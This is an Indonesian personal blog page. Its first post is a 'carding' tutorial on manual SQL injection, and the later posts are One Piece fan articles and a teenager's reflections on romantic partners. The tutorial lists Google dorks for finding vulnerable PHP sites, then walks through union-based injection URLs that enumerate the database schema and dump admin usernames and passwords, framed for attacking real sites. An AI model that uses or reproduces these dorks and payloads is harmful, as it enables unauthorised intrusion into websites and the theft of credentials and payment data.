Tutorial Carding Sql Injection Manual



Untuk Mencari Target
Cari saja dengan mudah menggunakan dork dork yang sdh tersedia dibawah atau hasil pengembangan agan2 sendiri
Code:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:read.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()

Langkah2nya :
1. Pilih salah satu website yang telah ditemukan tadi.
Misal:
http://www.example.com/index.php?id=3
untuk memeriksa adanya Bug MySQL tinggal tambahin ' (petik) di akhir URL
Contoh:
http://www.example.com/index.php?id=3'
lalu tekan enter sampai mendapatkan tulisan error.

2.Mendapatkan Jumlah Kolom
Cara termudah untuk melakukannya adalah menggunakan query 'order by'. Yang harus dilakukan adalah meletakkan ORDER BY (angka) --
pada akhir url .
Contoh:
http://www.example.com/index.php?id=3 ORDER BY (number)--

Pada kasus kita harus mencari sampe menemukan error pada situs tersebut.
Contoh:
http://www.example.com/index.php?id=3 ORDER BY 1-- belum error
http://www.example.com/index.php?id=3 ORDER BY 2-- belum error
http://www.example.com/index.php?id=3 ORDER BY 3-- belum error
http://www.example.com/index.php?id=3 ORDER BY 9-- belum error
http://www.example.com/index.php?id=3 ORDER BY 10-- error

Maka dapat kita simpulkan jika jumlah kolomnya hanya ada 9, karena jika 10 maka terjadi error.

3. Cari Informasi
Kita melakukan hal tersebut dengan menggunakan fungsi "UNION SELECT" dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL, seperti contoh berikut:

Contoh:
http://www.example.com/index.php?id=-3+U...,6,7,8,9--
Jangan lupa untuk menyisipkan tanda "-" sebelum isi parameter id , jadi sebagai contoh di atas kita selipka tanda "-" didepan angka "3", nah setelah semua dilakukan, maka akan muncul table yang memiliki isi didalamnya. Catatlah nomor kolom table yang memiliki informasi di dalam database tersebut.

4. Mencari versi dari database
Sebelum kita melanjutkan hal ini, maka yang perlu kita ketahui adalah versi dari database.
URL nya adalah sebagai berikut:
Code:
http://www.example.com/index.php?id=-3+U...,6,7,8,9--
Kita ganti angka yang keluar tadi di nomor 3 dengan “@@version” untuk mengetahui informasi versi database, berikut contohnya:

Semisal tadi muncul di angka 1 maka:
http://www.example.com/index.php?id=-3+U...,6,7,8,9--

Jika di angka 3 maka:
http://www.example.com/index.php?id=-3+U...,6,7,8,9--

Tekan enter, maka anda akan menemukan informasi database yang digunakan.
Hal ini biasanya bekerja pada versi database 5.* keatas.

5. Mencari nama database
Kita lakukan hal ini dengan mengganti "@@version"
dengan "group_concat(schema_name)" dan juga ditambahkan "+ from+information_schema.schemata–" sesudah kata terakhir di table database.
Contoh:

http://www.example.com/index.php?id=-3+U...5,6,7,8,9+ from+information_schema.schemata--
Hal tersebut akan menunjukkan daftar nama database. Sekarang untuk menemukan database mana yang saat ini dipakai adalah dengan mengganti "group_concat(schema_name)" dengan concat(database()) dan hapus "+ from+information_schema.schemata"
Jadi URL nya akan menjadi seperti ini:

http://www.example.com/index.php?id=-3+U...,6,7,8,9--

Selamat, anda telah mendapatkan informasi database yang saat ini digunakan.

6. Mencari Nama Tabel

Untuk mengetahui nama table yang digunakan dalam database, anda harus mengganti "concat(database())" dengan group_concat(table_name) dan tambahkan "from information_schema.tables where table_schema=database()" diantara nomor awal dan "–" hapus juga tanda "+" dari "union select".

Contoh:
http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()--

Maka semua nama tabel akan terlisting secara otomatis.

7. Menemukan Nama Kolom

Lakukan dengan hanya merubah "table_name" ke "column_name" dan "information_schema.tables" ke "information_schema.columns".

Contoh
http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()--
Hal tersebut akan memunculkan nama table.

8. Mengambil Informasi Database
Sekarang kita sudah mengetahui "database name, table names, dan colomn names", kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana, kita lakukan dengan contoh berikut:

http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7,8,9 from databasename.tablename--
Sekarang ganti "columnname" dengan kolom yang anda mau ambil informasinya. "0x3a" akan membuat jeda diantara informasi yang anda dapatkan dari masing-masing kolom. Jangan lupa juga untuk merubah "databasename.tablename" dengan database dan nama tabel dimana kolom ada di database dan tabel tersebut.

Contoh:
http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7,8,9 from user.t_admin--
Sekarang anda akan mendapatkan informasi username & database

Kembangkanlah ilmu dan sebarkanlah ilmu walau satu ayat.
Terima kasih
Salam te-putranto.blogspot.com
Posted by Unknown at 21:59 1 comments

7 Misteri One Piece Akhirnya Terkuak

One Piece
Pasti kamu sudah tahu tentang anime dan manga yang satu ini. One Piece adalah karya fiksi dari Eiichiro Oda yang bercerita tentang petualangan bajak laut Monkey D. Luffy. Komiknya sendiri dirilis pada tahun 1997 di Jepang sana sampai terjual ke seluruh dunia dan masih berlanjut hingga kini. Kamu yang menyukai serial One Piece pasti mengetahui bahwa ada begitu banyak misteri dalam One Piece yang belum terungkap. Mari kita bahas satu-persatu, misteri yang paling membuat penasaran dalam One Piece.

1. ONE PIECE

One Piece
One Piece

Yang utama, tentu saja, One Piece! Harta karun yang diberitahukan oleh Raja Bajak Laut, Gol D. Roger sebelum kematiannya. Apa itu One Piece? Harta karun yang berbentuk apa?

2. INISIAL D

Inisial D
Inisial D

Monkey D. Luffy, Monkey D. Dragon dan Monkey D. Garp adalah penyandang inisial D dengan nama depan ‘Monkey’. Disusul dengan Gol D. Roger, Marshall D. Teach, Jaguar D. Saulo dan Portgas D. Ace yang memiliki inisial D namun berbeda nama depan. Apa sebenarnya arti dari inisial D tersebut? Apa ini semua ada hubungannya dengan kejadian-kejadian sebelum segala cerita tentang bajak laut ini dimulai?

3. RAFTEL

Raftel
Raftel

Pulau paling ujung dari New World yang katanya tersimpan One Piece. Seberapa sulitkah para bajak laut datang ke sini sehingga hanya Gol D. Roger yang mampu sampai di sana? Apakah ada misteri lain yang berada di Raftel?

4. VOID CENTURY

Void Century
Void Century

Masa yang dikenal sebagai “abad yang hilang” ini menjadi pemicu kejadian-kejadian menarik di One Piece. Pemberontakan untuk World Government sekarang mungkin berawal dari sini. Bagian-bagian sejarah yang terukir di Poneglyph semua adalah untuk menguak misteri Void Century ini.

5. PLUTON & POSEIDON

Pluton & Poseidon
Pluton & Poseidon

Pluton dan Poseidon adalah senjata pemusnah massal di dalam cerita ini. Poseidon sudah diketahui teka-tekinya, tinggal Pluton yang masih menjadi misteri. Kabarnya, Pluton berada di Alabasta (daerah Arab). Sesuai dengan kenyataan dunia sekarang? Kamu yang tentukan.

6. KEKUATAN GOL D. ROGER

Gol D. Roger
Gol D. Roger

Semua bermula dari dirinya. Disebut sebagai Raja Bajak Laut dan dikisahkan bahwa ia seimbang dengan Shirohige masa muda, kira-kira kekuatan dahsyat seperti apa yang ia punya?

7. KUROHIGE / MARSHALL D. TEACH / BLACKBEARD

Kurohige / Marshall D. Teach / Blackbeard
Kurohige / Marshall D. Teach / Blackbeard

Secara tiba-tiba, ia menjadi musuh utama bagi banyak kalangan, baik bagi Bajak Laut maupun World Government itu sendiri. Masih belum jelas apa yang ia sembunyikan di cerita ini. Kenapa ia menyandang inisial D? Karena ia bisa menyerap kekuatan orang lain, kehebatan seperti apa yang ia punya sekarang?
Mungkin inilah sebagian besar misteri yang masih tersimpan dalam One Piece. Oda Sensei memang berhasil membuat para pembaca penasaran dengan kisah unik yang ia paparkan. Rumit karena mencakup banyak hal. Mulai dari sejarah, politik, konspirasi dan hal-hal lain di dunia sebenarnya sukses ia gabungkan menjadi satu kesatuan yang luar biasa. Awesome!(rei)
Posted by Unknown at 08:12 1 comments

Arti gelar "D" di One Piece



One Piece - Gelar D adalah suatu gelar yang bermaksud dengan musuh abadi para dewa, entah mengapa pemelik gelar D sangat membenci manusia penyembah dewa, saya mendapatkan informasi ini setelah saya membaca komik One Piece yang pada saat itu terjadi bentrok antar Doflamingo dan Trafalagar Law, di sana Law menanyakan kepada Doflamingo arti nama D yang sebenarnya, dan Doflamingo menjawab, D adalah gelar yang berarti Musuh Abadi Para Dewa, di situ Law mulai sadar ternyata Monkey D Luffy yang saat itu membantunya adalah musuh para Dewa di sana Law juga bermaksud ingin mendapatkan gelar tersebut bersama luffy law melawan Doflamingo, Mingo sendiri adalah keturunan para dewa mungkin pada gelarnya yaitu Keluarga Besar Donquixote, saya juga belum paham sekali mengenai ini yang jelas pada saat saya membaca komik saya mendengar ucapan Doflamingo tersebut, disitulah Law mulai mendapatkan gelar D yang berarti musuh abadi para dewa, Monkey D Dragon pun sama seperti pemilik gelar D yang lain, dia menentang aturan pemerintah dunia demi mewujudkan Era baru, karena yang saya dengan Pemerintah Dunia yang di pimpin oleh Tenryubito adalah keluarga Donquixote yang berarti Dewa jelas saja Dragon menentang Pemerintah Dunia, karna memang dia musuh abadi para dewa, terimakasih sudah menyimak walau tidak terlalu bermanfaat semoga bermanfaat saja.
Posted by Unknown at 08:01 0 comments

Sifat dan karakter seorang kekasih Baik/Buruk




TE-Putranto - "Kekasih merupakan suatu teman hidup yang bisa membuat kita senang maupun duka dan menjalani nya bersama-sama" , Itulah menurut saya arti seorang kekasih, kekasih juga mampu membuat kita jenuh ? apakah benar ? ya tentusaja logikanya anda mempunyai seorang kekasih, tetapi kekasih yang anda miliki itu selalu saja mengesalkan ada, contohnya chat di belakang anda dengan lelaki yang tidak ke kenali identitasnya, itu semua pasti membuat semua laki-laki kesal pada wanita, tapi setelah di putuskan, malah laki-laki yang salah. Terkadang seseorang ingin sekali menang sendiri tanpa ada rasa lelah atau kecapaian, maka dari itu kalian semua harus bersabar menghadapi seseorang kekasih yang memiliki watak seperti yang saya tulis pada artikel ini, alhamdulilah saya baru berumur 14Tahun sudah di karuniai seorang kekasih yang akan setia sampai saya menikah dengan dia nanti amin... :)
semoga kalian juga yang memiliki kekasih bakalan seperti saya pemikirannya, tak peduli orang berkata apa, yang penting kita ini usaha sendiri, belajar sendiri, cari pengalaman sendiri, dan merapasakan nya sendiri, dari pada fotocopy, hadeh.... itu lebih memalukan...., ohh iya terkadang wanita juga membuat kita happy, saat kita ada masalah entah itu pada diri sendiri atau sodara, orang tua, teman, guru, dll seorang kekasih pasti akan memberi masukan kepada hati kita, supaya hati kita lebih rilex dan lebih percaya diri kembali, tapi yang harus kalian ingat, tak semua orang memiliki kekasih yang setia, terkadang seorang kekasih itu hanya ingin memanfaatkan kekasih nya sendiri, hal itu sering terjadi mungkin saya lihat teman-teman saya, yah begitulah, semoga itu tidak terjadi kepada saya dan kita semua amin... :)
seorang kekasih juga mampu membuat diri kita merasa ramai dan juga tentram, karna pada saat kita tidak memiliki kekasih, mungkin kita akan merasa sendiri, hampa dan tak berdaya :'( galauman...
perlu bukti ? coba kalian putuskan kekasih yang paling kalian sayang, dan rasakan sendiri akibatnya haha....
ohh iya sedikit masukan ni pada laki-laki tolong jaga kekasih nya dengan baik, karna sekarang sudah masuk di mana-mana yang namanya cabe-cabean, bahaya tuh kalo terjadi sama kekasih kita, semoga tidak terjadi ya amin... :)
saya berimasukan sering lah meminjam HP nya dan lihat Telepon masuk / Keluar / Tak Terjawab / Apalah pokoknya, dan juga lihat teman-teman BBM nya atau contact SMS nya mungkin ada yang mencurigakan, ya semoga laki-laki bisa menahan kelakuan wanita zaman sekarang amin :)
dan untuk perempuan saya berimasukan, seringlah cek HP si cowo, seperti di atas Telpon masuk / Keluar / Tak Terjawab, dan juga sering-sering lihat Video di HP/Laptopnya, mungkinkah ada sesuatu, ya itu rahasia orang tersebut, kita gak boleh bongkar, karna takutnya bakalan menjadi fitnah , astagfirullah jangan sampe ya allah amit-amit :)

Oke mungkin cukup artikel dari saya semoga bermanfaat wasalam :)
Posted by Unknown at 09:22 0 comments
 
Temukan Saya Di : Facebook | Website
Copyright © 2015. TEPutranto - All Rights Reserved
Template Modify by Putranto Widitama
Create Template by MasTemplate